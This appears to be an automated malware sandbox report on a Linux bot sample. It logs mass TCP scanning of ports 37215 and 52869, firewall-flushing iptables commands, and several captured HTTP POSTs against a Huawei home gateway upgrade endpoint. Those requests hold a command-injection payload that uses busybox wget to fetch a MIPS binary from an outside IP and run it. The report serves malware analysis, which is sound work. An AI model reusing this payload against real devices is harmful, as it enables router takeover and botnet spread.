Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.245.182.45:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.174.119.241:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.70.222.167:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.22.118.222:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.158.75.210:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.191.81.155:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.157.4.180:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.183.250.210:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.255.117.138:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.251.147.104:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.116.108.125:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.42.115.250:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.148.184.193:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.236.81.181:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.211.171.30:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.135.16.120:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.246.237.86:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.159.88.253:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.4.199.35:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.1.191.50:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.118.15.2:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.13.144.62:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.179.240.216:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.8.191.197:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.97.120.79:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.104.117.11:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.205.80.155:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.103.84.190:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.248.86.73:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.4.47.49:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.224.103.192:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.156.210.45:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.225.148.119:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.231.21.240:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.5.156.121:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.8.140.79:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.176.235.234:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.234.74.45:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.110.83.47:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.36.214.34:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.129.35.79:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.139.109.104:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.39.9.240:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.168.237.108:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.214.87.170:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.55.222.130:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.90.52.12:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.46.61.144:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.163.242.2:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.173.154.146:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.211.117.159:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.147.125.220:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.160.234.60:37215
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.107.236.75:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 197.168.233.75:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.160.2.115:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.162.35.174:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 197.111.12.250:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.201.236.117:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.134.97.49:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.172.98.192:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.66.179.59:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 197.81.15.64:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.233.33.14:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.70.118.12:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.58.47.62:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.125.205.130:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.246.196.84:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 197.74.158.74:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.54.233.166:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.64.188.84:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 41.134.109.238:52869
Source: global traffic TCP traffic: 192.168.2.23:16500 -> 156.50.248.18:52869
Sample listens on a socket
Source: /usr/sbin/sshd (PID: 5368) Socket: 0.0.0.0::22 Jump to behavior
Source: /usr/sbin/sshd (PID: 5368) Socket: [::]::22 Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5301) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5302) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 